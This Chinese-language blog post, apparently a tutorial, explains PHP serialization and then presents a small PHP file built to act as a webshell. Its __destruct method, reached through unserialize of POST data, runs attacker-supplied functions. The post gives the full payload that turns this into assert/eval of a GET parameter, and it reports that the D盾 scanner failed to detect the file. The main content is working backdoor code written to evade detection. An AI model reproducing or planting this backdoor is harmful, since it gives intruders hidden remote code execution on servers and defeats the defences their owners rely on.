这次这篇文章想法主要是在de1ctf一题shellshellshell过反序列化漏洞制造SSRF登录,然后如果用反序列化来逃脱waf检查应该比较简单。
先简单讲下什么是php反序列化:
序列化:把复杂的数据类型压缩到一个字符串中 数据类型可以是数组,字符串,对象等 函数 : serialize()
反序列化:恢复原先被序列化的变量 函数: unserialize()
一个简单demo序列化:
class dog{
public $a = 'age is one';
}
输出的序列化:O:3:"dog":1:{s:1:"a";s:10:"age is one";}
O代表结构类型为:类,3表示类名长度,接着是类名、属性(成员)个数
大括号内分别是:属性名类型、长度、名称;值类型、长度、值
反序列化就是把序列化输出结果还原就是反序列化,这样我们就可以构造一个payload进行调用从而绕过D盾安全狗什么。
常用的魔法函数
我就直接贴smile师傅里的东西了,就难得写了
__construct()当一个对象创建时被调用,但在unserialize()时是不会自动调用的。
__destruct()当一个对象销毁时被调用
__toString()当一个对象被当作一个字符串使用
__sleep() 在对象在被序列化之前运行
__wakeup将在序列化之后
现在我们来理解这个代码
<?php
classA{
public $name;
public $muma;
function __destruct(){
$a = $this->name;
$a($this->muma);
}
}
unserialize($_POST['waf']);?>
->用来引用一个类的属性(变量)、方法(函数)
其实可以理解为就是调用
POST传参传入:
waf=O:1:"A":2:{s:4:"name";s:6:"assert";s:4:"muma";s:16:"eval($_GET["a"])";}
get 传入参数:
a=phpinfo():
我们先把写好的代码放入www目录下,然后使用D盾扫描效果如下
并没有发现木马。
现在尝试能不能打开phpinfo,发现成功被打开。
而且D盾并没有报错,禁止访问那个文件是装的D盾配置文件,所以成功绕过D盾的查杀。
